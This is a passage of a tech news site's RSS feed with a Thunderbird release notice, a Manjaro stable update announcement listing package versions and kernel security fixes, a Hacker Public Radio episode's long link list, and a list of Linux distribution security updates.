<content:encoded><![CDATA[Mozilla hat ein frisches Update für den Thunderbird veröffentlicht. Die Version 151.0 bringt vor allem unter der Haube einige Verbesserungen mit. Wer EWS-Konten nutzt, kann nun die Details der OAuth-Anbieter manuell überschreiben und die Einrichtung via Thundermail OAuth klappt jetzt...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-151-0-steht-zum-download-bereit/">Thunderbird 151.0 steht zum Download bereit</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2026-05-19 - Kernels, Plasma 6, KDE Gear, KDE Frameworks, COSMIC, Vulkan]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of May, beginning of June. Development speed may be a little slower the upcoming weeks. However, still let us know any issue...]]></description>
<link>https://tsecurity.de/de/3529109/unix-server/stable-update-2026-05-19-kernels-plasma-6-kde-gear-kde-frameworks-cosmic-vulkan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3529109/unix-server/stable-update-2026-05-19-kernels-plasma-6-kde-gear-kde-frameworks-cosmic-vulkan/</guid>
<pubDate>Tue, 19 May 2026 14:31:16 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of May, beginning of June. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-857513-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-857513-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-857513-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-857513-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/stable-update-2026-05-19-kernels-plasma-6-kde-gear-kde-frameworks-cosmic-vulkan/187782/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/stable-update-2026-05-19-kernels-plasma-6-kde-gear-kde-frameworks-cosmic-vulkan/187782/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/stable-update-2026-05-19-kernels-plasma-6-kde-gear-kde-frameworks-cosmic-vulkan/187782/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/stable-update-2026-05-19-kernels-plasma-6-kde-gear-kde-frameworks-cosmic-vulkan/187782/1">(click for more details)</a>
<h2><a name="p-857513-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-857513-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernel</strong> updates
<ul>
<li>Note: <code>linux510</code> and <code>linux515</code> series got removed from our repos. Please adopt to <code>linux6x</code> series.</li>
<li>this includes security fixes for <a href="https://forum.manjaro.org/t/187451">Dirty Frag (CVE-2026-43284, CVE-2026-43500)</a></li>
<li>including initial fixes for <a href="https://forum.manjaro.org/t/187646" class="inline-onebox">[ALERT] CopyFail 3.0 - Fragnesia - Unpatched vulnerability</a></li>
<li>including fixes for <a href="https://forum.manjaro.org/t/187676" class="inline-onebox">[ALERT] ssh-keysign-pwn, unprivileged users are able to read root-owned files</a></li>
<li>Note: not all kernel series are patched. It is recommended to keep the suggested mitigations active</li>
</ul>
</li>
<li><strong>GCC</strong> <a href="https://gcc.gnu.org/gcc-16/">16</a></li>
<li><strong>COSMIC</strong> Epoch <a href="https://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.0.12">1.0.12</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/150.0.3/releasenotes/">150.0.3</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/thunderbird/150.0.2/releasenotes/">150.0.2</a></li>
<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/26.04.1/">26.04.1</a></li>
<li><strong>KDE Frameworks</strong> <a href="http://kde.org/announcements/frameworks/6/6.26.0/">6.26.0</a></li>
<li><strong>Plasma</strong> <a href="https://kde.org/announcements/plasma/6/6.6.5/">6.6.5</a></li>
<li><strong>Gambas</strong> <a href="https://gambaswiki.org/wiki/doc/release/3.21.6">3.21.6</a></li>
<li><strong>Qt</strong> <a href="https://www.qt.io/blog/qt-6.11.1-released">6.11.1</a></li>
<li><strong>PipeWire</strong> <a href="https://gitlab.freedesktop.org/pipewire/pipewire/-/releases/1.6.5">1.6.5</a></li>
<li><strong>COSMIC</strong> Epoch <a href="http://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.0.13">1.0.13</a></li>
<li><strong>Vulkan SDK</strong> <a href="https://www.lunarg.com/lunarg-releases-vulkan-sdk-1-4-350-0/">1.4.350.0</a></li>
<li><strong>Gstreamer</strong> <a href="https://gstreamer.freedesktop.org/releases/1.28/#1.28.3">1.28.3</a></li>
<li><strong>LibreOffice</strong> <a href="https://blog.documentfoundation.org/blog/2026/05/12/tdf-announces-libreoffice-25-8-7/">25.8.7</a></li>
<li><strong>ROCm</strong> <a href="https://rocm.docs.amd.com/en/latest/about/release-notes.html">7.2.3</a></li>
<li><strong>Heroic Games Launcher</strong> <a href="https://github.com/Heroic-Games-Launcher/HeroicGamesLauncher/releases/tag/v2.22.0">2.22.0</a></li>
<li><strong>certbot</strong> <a href="https://community.letsencrypt.org/t/certbot-5-6-0-release/247163">5.6.0</a></li>
<li>Updates to <strong>python</strong>, <strong>Deepin</strong> and <strong>Haskell</strong></li>
</ul>
<h2><a name="p-857513-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-857513-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/stable-update-2026-05-19-kernels-plasma-6-kde-gear-kde-frameworks-cosmic-vulkan/187782/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/stable-update-2026-05-19-kernels-plasma-6-kde-gear-kde-frameworks-cosmic-vulkan/187782/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.173</li>
<li>linux66 6.6.140</li>
<li>linux612 6.12.90</li>
<li>linux618 6.18.32</li>
<li>linux70 7.0.9</li>
<li>linux71 7.1.0-rc4</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.133_rt73</li>
<li>linux612-rt 6.12.79_rt17</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (5/18/26 15:52 CEST)</p>
<ul>
<li>stable core x86_64:  92 new and 96 removed package(s)</li>
<li>stable extra x86_64:  3815 new and 3881 removed package(s)</li>
<li>stable multilib x86_64:  47 new and 47 removed package(s)</li>
</ul>
<p>All package changes can be reviewed <a href="https://termbin.com/f4vo">here</a></p>
<p><a href="https://forum.manjaro.org/t/stable-update-2026-05-19-kernels-plasma-6-kde-gear-kde-frameworks-cosmic-vulkan/187782/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/stable-update-2026-05-19-kernels-plasma-6-kde-gear-kde-frameworks-cosmic-vulkan/187782">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4642: Hackerpublic Radio New Years Eve Show 2026 Episode 7]]></title>
<description><![CDATA[This show has been flagged as Explicit by the host.



PFSense









https://www.pfsense.org/









Chromebook









https://www.google.com/chromebook/discover-chromebook/









AMD Sempron 140









https://www.techpowerup.com/cpu-specs/sempron-140.c820
...]]></description>
<link>https://tsecurity.de/de/3527509/podcasts/hpr4642-hackerpublic-radio-new-years-eve-show-2026-episode-7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3527509/podcasts/hpr4642-hackerpublic-radio-new-years-eve-show-2026-episode-7/</guid>
<pubDate>Tue, 19 May 2026 02:02:56 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Explicit by the host.</p>

<p>

PFSense
</p>

<p>

</p>

<p>

<a href="https://www.pfsense.org/" rel="noopener noreferrer" target="_blank">
https://www.pfsense.org/</a>

</p>

<p>

</p>

<p>

Chromebook
</p>

<p>

</p>

<p>

<a href="https://www.google.com/chromebook/discover-chromebook/" rel="noopener noreferrer" target="_blank">
https://www.google.com/chromebook/discover-chromebook/</a>

</p>

<p>

</p>

<p>

AMD Sempron 140
</p>

<p>

</p>

<p>

<a href="https://www.techpowerup.com/cpu-specs/sempron-140.c820" rel="noopener noreferrer" target="_blank">
https://www.techpowerup.com/cpu-specs/sempron-140.c820</a>

</p>

<p>

</p>

<p>

Trinity
</p>

<p>

</p>

<p>

<a href="https://www.trinitydesktop.org/" rel="noopener noreferrer" target="_blank">
https://www.trinitydesktop.org/</a>

</p>

<p>

</p>

<p>

XFCE
</p>

<p>

</p>

<p>

<a href="https://www.xfce.org/" rel="noopener noreferrer" target="_blank">
https://www.xfce.org/</a>

</p>

<p>

</p>

<p>

</p>

<p>

Chrome OS
</p>

<p>

</p>

<p>

<a href="https://chromeos.google/" rel="noopener noreferrer" target="_blank">
https://chromeos.google/</a>

</p>

<p>

</p>

<p>

SSH
</p>

<p>

</p>

<p>

<a href="https://www.ssh.com/" rel="noopener noreferrer" target="_blank">
https://www.ssh.com/</a>

</p>

<p>

</p>

<p>

Onshape
</p>

<p>

</p>

<p>

<a href="https://www.onshape.com/en/" rel="noopener noreferrer" target="_blank">
https://www.onshape.com/en/</a>

</p>

<p>

</p>

<p>

TinkerCAD
</p>

<p>

</p>

<p>

<a href="https://www.tinkercad.com/" rel="noopener noreferrer" target="_blank">
https://www.tinkercad.com/</a>

</p>

<p>

</p>

<p>

Thorium OS
</p>

<p>

</p>

<p>

<a href="https://thorium.rocks/thoriumos" rel="noopener noreferrer" target="_blank">
https://thorium.rocks/thoriumos</a>

</p>

<p>

</p>

<p>

Tech And Coffee
</p>

<p>

</p>

<p>

<a href="https://techandcoffee.info/" rel="noopener noreferrer" target="_blank">
https://techandcoffee.info/</a>

</p>

<p>

</p>

<p>

Panera
</p>

<p>

</p>

<p>

<a href="https://www.panerabread.com/en-us/home.html" rel="noopener noreferrer" target="_blank">
https://www.panerabread.com/en-us/home.html</a>

</p>

<p>

</p>

<p>

IHOP
</p>

<p>

</p>

<p>

<a href="https://www.panerabread.com/en-us/home.html" rel="noopener noreferrer" target="_blank">
https://www.panerabread.com/en-us/home.html</a>

</p>

<p>

</p>

<p>

Waffle House
</p>

<p>

</p>

<p>

<a href="https://www.wafflehouse.com/" rel="noopener noreferrer" target="_blank">
https://www.wafflehouse.com/</a>

</p>

<p>

</p>

<p>

In And Out Burger
</p>

<p>

</p>

<p>

<a href="https://www.in-n-out.com/" rel="noopener noreferrer" target="_blank">
https://www.in-n-out.com/</a>

</p>

<p>

</p>

<p>

Economies Of Scale
</p>

<p>

</p>

<p>

<a href="https://www.investopedia.com/terms/e/economiesofscale.asp" rel="noopener noreferrer" target="_blank">
https://www.investopedia.com/terms/e/economiesofscale.asp</a>

</p>

<p>

</p>

<p>

Dunkin Donuts
</p>

<p>

</p>

<p>

<a href="https://www.dunkindonuts.com/en" rel="noopener noreferrer" target="_blank">
https://www.dunkindonuts.com/en</a>

</p>

<p>

</p>

<p>

F-Droid
</p>

<p>

</p>

<p>

<a href="https://f-droid.org/en/" rel="noopener noreferrer" target="_blank">
https://f-droid.org/en/</a>

</p>

<p>

</p>

<p>

Cheap Yellow Display
</p>

<p>

</p>

<p>

<a href="https://blog.decryption.net.au/posts/cyd-for-beginners.html" rel="noopener noreferrer" target="_blank">
https://blog.decryption.net.au/posts/cyd-for-beginners.html</a>

</p>

<p>

</p>

<p>

NTP Server
</p>

<p>

</p>

<p>

<a href="https://www.ntppool.org/en/" rel="noopener noreferrer" target="_blank">
https://www.ntppool.org/en/</a>

</p>

<p>

</p>

<p>

Beagle (Dog)
</p>

<p>

</p>

<p>

<a href="https://www.akc.org/dog-breeds/beagle/" rel="noopener noreferrer" target="_blank">
https://www.akc.org/dog-breeds/beagle/</a>

</p>

<p>

</p>

<p>

Siamese Cat
</p>

<p>

</p>

<p>

<a href="https://www.life-with-siamese-cats.com/" rel="noopener noreferrer" target="_blank">
https://www.life-with-siamese-cats.com/</a>

</p>

<p>

</p>

<p>

Bsides InfoSec Conference - Knoxville, TN
</p>

<p>

</p>

<p>

<a href="https://www.papercall.io/bsides-knoxville-2026" rel="noopener noreferrer" target="_blank">
https://www.papercall.io/bsides-knoxville-2026</a>

</p>

<p>

</p>

<p>

CI/CD Pipeline
</p>

<p>

</p>

<p>

<a href="https://circleci.com/blog/what-is-a-ci-cd-pipeline/" rel="noopener noreferrer" target="_blank">
https://circleci.com/blog/what-is-a-ci-cd-pipeline/</a>

</p>

<p>

</p>

<p>

Strace Command
</p>

<p>

</p>

<p>

<a href="https://www.geeksforgeeks.org/linux-unix/strace-command-in-linux-with-examples/" rel="noopener noreferrer" target="_blank">
https://www.geeksforgeeks.org/linux-unix/strace-command-in-linux-with-examples/</a>

</p>

<p>

</p>

<p>

High Pass Filter
</p>

<p>

</p>

<p>

<a href="https://www.izotope.com/en/learn/6-ways-to-use-a-high-pass-filter-when-mixing" rel="noopener noreferrer" target="_blank">
https://www.izotope.com/en/learn/6-ways-to-use-a-high-pass-filter-when-mixing</a>

</p>

<p>

</p>

<p>

Waters &amp; Stanton - Radio Shop
</p>

<p>

</p>

<p>

<a href="https://www.hamradiostore.co.uk/" rel="noopener noreferrer" target="_blank">
https://www.hamradiostore.co.uk/</a>

</p>

<p>

</p>

<p>

Home Assistant
</p>

<p>

</p>

<p>

<a href="https://www.home-assistant.io/" rel="noopener noreferrer" target="_blank">
https://www.home-assistant.io/</a>

</p>

<p>

</p>

<p>

ESP 32
</p>

<p>

</p>

<p>

<a href="https://www.espressif.com/en/products/socs/esp32" rel="noopener noreferrer" target="_blank">
https://www.espressif.com/en/products/socs/esp32</a>

</p>

<p>

</p>

<p>

EMF Camp
</p>

<p>

</p>

<p>

<a href="https://www.emfcamp.org/" rel="noopener noreferrer" target="_blank">
https://www.emfcamp.org/</a>

</p>

<p>

</p>

<p>

YAML
</p>

<p>

</p>

<p>

<a href="https://yaml.org/" rel="noopener noreferrer" target="_blank">
https://yaml.org/</a>

</p>

<p>

</p>

<p>

ChatGPT
</p>

<p>

</p>

<p>

<a href="https://chatgpt.com/" rel="noopener noreferrer" target="_blank">
https://chatgpt.com/</a>

</p>

<p>

</p>

<p>

TOR
</p>

<p>

</p>

<p>

<a href="https://www.torproject.org/" rel="noopener noreferrer" target="_blank">
https://www.torproject.org/</a>

</p>

<p>

</p>

<p>

IPTables
</p>

<p>

</p>

<p>

<a href="https://linux.die.net/man/8/iptables" rel="noopener noreferrer" target="_blank">
https://linux.die.net/man/8/iptables</a>

</p>

<p>

</p>

<p>

<a href="https://ccrma.stanford.edu/planetccrma/man/man8/ipchains.8.html" rel="noopener noreferrer" target="_blank">
https://ccrma.stanford.edu/planetccrma/man/man8/ipchains.8.html</a>

</p>

<p>

</p>

<p>

RSYNC
</p>

<p>

</p>

<p>

<a href="https://linux.die.net/man/1/rsync" rel="noopener noreferrer" target="_blank">
https://linux.die.net/man/1/rsync</a>

</p>

<p>

</p>

<p>

SYM Link
</p>

<p>

</p>

<p>

<a href="https://stackoverflow.com/questions/1951742/how-can-i-symlink-a-file-in-linux" rel="noopener noreferrer" target="_blank">
https://stackoverflow.com/questions/1951742/how-can-i-symlink-a-file-in-linux</a>

</p>

<p>

</p>

<p>

CDN (Content Delivery Network)
</p>

<p>

</p>

<p>

<a href="https://www.cloudflare.com/learning/cdn/what-is-a-cdn/" rel="noopener noreferrer" target="_blank">
https://www.cloudflare.com/learning/cdn/what-is-a-cdn/</a>

</p>

<p>

</p>

<p>

Mastadon
</p>

<p>

</p>

<p>

<a href="https://joinmastodon.org/" rel="noopener noreferrer" target="_blank">
https://joinmastodon.org/</a>

</p>

<p>

</p>

<p>

DuoLingo
</p>

<p>

</p>

<p>

<a href="https://www.duolingo.com/" rel="noopener noreferrer" target="_blank">
https://www.duolingo.com/</a>

</p>

<p>

</p>

<p>

Fedora
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/Fedora" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/Fedora</a>

</p>

<p>

</p>

<p>

Pea Coat
</p>

<p>

</p>

<p>

<a href="https://www.artofmanliness.com/style/clothing/mans-guide-pea-coat/" rel="noopener noreferrer" target="_blank">
https://www.artofmanliness.com/style/clothing/mans-guide-pea-coat/</a>

</p>

<p>

</p>

<p>

Haiku
</p>

<p>

</p>

<p>

<a href="https://www.haiku-os.org/" rel="noopener noreferrer" target="_blank">
https://www.haiku-os.org/</a>

</p>

<p>

</p>

<p>

Hunt Brothers Pizza
</p>

<p>

</p>

<p>

<a href="https://www.huntbrotherspizza.com/" rel="noopener noreferrer" target="_blank">
https://www.huntbrotherspizza.com/</a>

</p>

<p>

</p>

<p>

Papa Johns Pizza
</p>

<p>

</p>

<p>

<a href="https://www.papajohns.com/omni/en" rel="noopener noreferrer" target="_blank">
https://www.papajohns.com/omni/en</a>

</p>

<p>

</p>

<p>

PIzza Hut
</p>

<p>

</p>

<p>

<a href="https://www.pizzahut.com/" rel="noopener noreferrer" target="_blank">
https://www.pizzahut.com/</a>

</p>

<p>

</p>

<p>

Dominos Pizza
</p>

<p>

</p>

<p>

<a href="https://www.dominos.com/" rel="noopener noreferrer" target="_blank">
https://www.dominos.com/</a>

</p>

<p>

</p>

<p>

Marcos Pizza
</p>

<p>

</p>

<p>

<a href="https://www.marcos.com/" rel="noopener noreferrer" target="_blank">
https://www.marcos.com/</a>

</p>

<p>

</p>

<p>

Little Ceasars Pizza
</p>

<p>

</p>

<p>

<a href="https://littlecaesars.com/en-us/" rel="noopener noreferrer" target="_blank">
https://littlecaesars.com/en-us/</a>

</p>

<p>

</p>

<p>

Hungry Howies Pizza
</p>

<p>

</p>

<p>

<a href="https://www.hungryhowies.com/" rel="noopener noreferrer" target="_blank">
https://www.hungryhowies.com/</a>

</p>

<p>

</p>

<p>

MOD Pizza
</p>

<p>

</p>

<p>

<a href="https://modpizza.com/" rel="noopener noreferrer" target="_blank">
https://modpizza.com/</a>

</p>

<p>

</p>

<p>

Papa Murphys Pizza
</p>

<p>

</p>

<p>

<a href="https://www.papamurphys.com/" rel="noopener noreferrer" target="_blank">
https://www.papamurphys.com/</a>

</p>

<p>

</p>

<p>

Wolfman Pizza
</p>

<p>

</p>

<p>

<a href="https://wolfmanpizza.com/" rel="noopener noreferrer" target="_blank">
https://wolfmanpizza.com/</a>

</p>

<p>

</p>

<p>

Fuel Pizza
</p>

<p>

</p>

<p>

<a href="https://www.fuelpizza.com/" rel="noopener noreferrer" target="_blank">
https://www.fuelpizza.com/</a>

</p>

<p>

</p>

<p>

Shallow Hal
</p>

<p>

</p>

<p>

<a href="https://www.rottentomatoes.com/m/shallow_hal" rel="noopener noreferrer" target="_blank">
https://www.rottentomatoes.com/m/shallow_hal</a>

</p>

<p>

</p>

<p>

South Coast Pizza
</p>

<p>

</p>

<p>

<a href="https://southcoastpizza.com/" rel="noopener noreferrer" target="_blank">
https://southcoastpizza.com/</a>

</p>

<p>

</p>

<p>

Casa Dora
</p>

<p>

</p>

<p>

<a href="https://www.casadoraitaliancusinepizzeria.com/" rel="noopener noreferrer" target="_blank">
https://www.casadoraitaliancusinepizzeria.com/</a>

</p>

<p>

</p>

<p>

National Pizza Day
</p>

<p>

</p>

<p>

<a href="https://www.nationaldaycalendar.com/national-day/national-pizza-day-february-9" rel="noopener noreferrer" target="_blank">
https://www.nationaldaycalendar.com/national-day/national-pizza-day-february-9</a>

</p>

<p>

</p>

<p>

Sagitarius
</p>

<p>

</p>

<p>

<a href="https://www.zodiacsign.com/zodiac-signs/sagittarius/" rel="noopener noreferrer" target="_blank">
https://www.zodiacsign.com/zodiac-signs/sagittarius/</a>

</p>

<p>

</p>

<p>

Alexa
</p>

<p>

</p>

<p>

<a href="https://alexa.amazon.com/userProfile?redirectTo=%2F" rel="noopener noreferrer" target="_blank">
https://alexa.amazon.com/userProfile?redirectTo=%2F</a>

</p>

<p>

</p>

<p>

Gemini
</p>

<p>

</p>

<p>

<a href="https://gemini.google.com/app" rel="noopener noreferrer" target="_blank">
https://gemini.google.com/app</a>

</p>

<p>

</p>

<p>

Netscape
</p>

<p>

</p>

<p>

<a href="https://isp.netscape.com/" rel="noopener noreferrer" target="_blank">
https://isp.netscape.com/</a>

</p>

<p>

</p>

<p>

Seamonkey
</p>

<p>

</p>

<p>

<a href="https://www.seamonkey-project.org/" rel="noopener noreferrer" target="_blank">
https://www.seamonkey-project.org/</a>

</p>

<p>

</p>

<p>

Thunderbird
</p>

<p>

</p>

<p>

<a href="https://www.thunderbird.net/en-US/" rel="noopener noreferrer" target="_blank">
https://www.thunderbird.net/en-US/</a>

</p>

<p>

</p>

<p>

ULC Minister
</p>

<p>

</p>

<p>

<a href="https://www.ulc.org/" rel="noopener noreferrer" target="_blank">
https://www.ulc.org/</a>

</p>

<p>

</p>

<p>

Church Of Spiritual Humanism
</p>

<p>

</p>

<p>

<a href="https://spiritualhumanism.org/" rel="noopener noreferrer" target="_blank">
https://spiritualhumanism.org/</a>

</p>

<p>

</p>

<p>

Oberon Zelle Ravenheart
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/Oberon_Zell-Ravenheart" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/Oberon_Zell-Ravenheart</a>

</p>

<p>

</p>

<p>

Temple of Wicca 
</p>

<p>

</p>

<p>

<a href="https://www.wiccanfamilytemple.org/" rel="noopener noreferrer" target="_blank">
https://www.wiccanfamilytemple.org/</a>

</p>

<p>

</p>

<p>

Church Of All Worlds
</p>

<p>

</p>

<p>

<a href="https://caw.org/" rel="noopener noreferrer" target="_blank">
https://caw.org/</a>

</p>

<p>

</p>

<p>

Progressive Universal Life Church
</p>

<p>

</p>

<p>

<a href="https://www.thepulc.com/" rel="noopener noreferrer" target="_blank">
https://www.thepulc.com/</a>

</p>

<p>

</p>

<p>

Pine Time
</p>

<p>

</p>

<p>

<a href="https://pine64.org/devices/pinetime/" rel="noopener noreferrer" target="_blank">
https://pine64.org/devices/pinetime/</a>

</p>

<p>

</p>

<p>

AmazFit Watch
</p>

<p>

</p>

<p>

<a href="https://us.amazfit.com/" rel="noopener noreferrer" target="_blank">
https://us.amazfit.com/</a>

</p>

<p>

</p>

<p>

Zepp App 
</p>

<p>

</p>

<p>

<a href="https://play.google.com/store/apps/details?id=com.huami.watch.hmwatchmanager&amp;hl=en_US&amp;pli=1" rel="noopener noreferrer" target="_blank">
https://play.google.com/store/apps/details?id=com.huami.watch.hmwatchmanager&amp;hl=en_US&amp;pli=1</a>

</p>

<p>

</p>

<p>

Pegasus Mail
</p>

<p>

</p>

<p>

<a href="https://www.pmail.com/" rel="noopener noreferrer" target="_blank">
https://www.pmail.com/</a>

</p>

<p>

</p>

<p>

Eudora
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/Eudora_(email_client)" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/Eudora_(email_client)</a>

</p>

<p>

</p>

<p>

Proton Mail
</p>

<p>

</p>

<p>

<a href="https://proton.me/mail" rel="noopener noreferrer" target="_blank">
https://proton.me/mail</a>

</p>

<p>

</p>

<p>

AOL
</p>

<p>

</p>

<p>

<a href="https://www.aol.com/" rel="noopener noreferrer" target="_blank">
https://www.aol.com/</a>

</p>

<p>

</p>

<p>

OpenSuse
</p>

<p>

</p>

<p>

<a href="https://www.opensuse.org/" rel="noopener noreferrer" target="_blank">
https://www.opensuse.org/</a>

</p>

<p>

</p>

<p>

Mandrake Linux
</p>

<p>

</p>

<p>

<a href="https://www.mandrakelinux.org/" rel="noopener noreferrer" target="_blank">
https://www.mandrakelinux.org/</a>

</p>

<p>

</p>

<p>

Virtualbox
</p>

<p>

</p>

<p>

<a href="https://www.virtualbox.org/" rel="noopener noreferrer" target="_blank">
https://www.virtualbox.org/</a>

</p>

<p>

</p>

<p>

Bitcoin
</p>

<p>

</p>

<p>

<a href="https://bitcoin.org/en/" rel="noopener noreferrer" target="_blank">
https://bitcoin.org/en/</a>

</p>

<p>

</p>

<p>

Norway
</p>

<p>

</p>

<p>

<a href="https://www.visitnorway.com/" rel="noopener noreferrer" target="_blank">
https://www.visitnorway.com/</a>

</p>

<p>

</p>

<p>

XFCE
</p>

<p>

</p>

<p>

<a href="https://www.xfce.org/" rel="noopener noreferrer" target="_blank">
https://www.xfce.org/</a>

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4642/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (freerdp, gimp:2.8, jq, kernel, and rsync), Debian (chromium, ffmpeg, firewalld, kernel, nginx, openjpeg2, openssh, php7.4, and redis), Fedora (apptainer, chromium, coturn, dnsmasq, firefox, kernel, libgit2_1.8, libmetal, nginx, nginx-mod-brotli, ngi...]]></description>
<link>https://tsecurity.de/de/3526095/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3526095/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 18 May 2026 15:26:52 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (freerdp, gimp:2.8, jq, kernel, and rsync), <b>Debian</b> (chromium, ffmpeg, firewalld, kernel, nginx, openjpeg2, openssh, php7.4, and redis), <b>Fedora</b> (apptainer, chromium, coturn, dnsmasq, firefox, kernel, libgit2_1.8, libmetal, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-js-challenge, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, open-amp, perl-Net-CIDR-Lite, pgbouncer, pypy, python-jupytext, python-uv-build, rsync, rust-astral-tokio-tar, uriparser, uv, valkey, and yelp), <b>Mageia</b> (dpkg, firefox, thunderbird, golang, haproxy, and samba), <b>Slackware</b> (dnsmasq and kernel), and <b>SUSE</b> (apache-commons-configuration2, apache2, apptainer, chromedriver, cups-filters, curl, dnsmasq, expat, ffmpeg-4, ffmpeg-7, firebird, firewalld, flux2-cli, glibc, go1.25, go1.26, gosec, grub2, ImageMagick, java-11-openj9, java-17-openj9, java-1_8_0-openj9, java-1_8_0-openjdk, java-21-openj9, java-25-openj9, kdenlive, kernel, kernel-devel, keylime-config, krb5, libIex-3_4-33, mozjs115, mozjs78, nginx, openssh, openvswitch, ovmf, PackageKit, perl-Crypt-URandom, perl-CryptX, perl-libwww-perl, perl-Net-CIDR-Lite, perl-Text-CSV_XS, podman, postgresql17, postgresql18, python-pyOpenSSL, python310, rsync, sed, tekton-cli, valkey, xen, and zypper-docker).]]></content:encoded>
